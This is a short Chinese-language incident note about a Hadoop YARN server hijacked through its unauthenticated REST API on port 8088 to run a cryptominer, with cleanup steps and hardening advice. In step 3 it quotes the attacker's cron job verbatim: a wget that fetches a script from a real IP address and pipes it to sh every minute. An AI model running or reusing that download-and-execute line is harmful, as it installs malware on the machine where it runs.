yarn一直在跑一个用户为dr.who的application
现象:
访问yarn:8088页面发现一直有任务在跑如图:
用户为dr.who,问下内部使用人员,都没有任务在跑;
结论:
恭喜你,你中毒了,攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击,攻击者可以在未授权的情况下远程执行代码的安全问题进行预警
用top命令发现cpu使用了360%多,系统会很卡。
解决办法:
1,通过查看占用cpu高得进程,kill掉此进程
2,检查/tmp和/var/tmp目录,删除java、ppc、w.conf等异常文件
3 ,通过crontab -l 查看有一个* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1任务,删除此任务
4,排查YARN日志,确认异常的application,删除处理
再通过top验证看是否还有高cpu进程,如果有,kill掉,没有的话应该正常了。
注意:YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,那么任何黑客则就均可利用其进行远程命令执行,从而进行挖矿等行为,黑客直接利用开放在8088的REST API提交执行命令,来实现在服务器内下载执行.sh脚本,从而再进一步下载启动挖矿程序达到挖矿的目的,因此注意并启用Kerberos认证功能,禁止匿名访问修改8088端口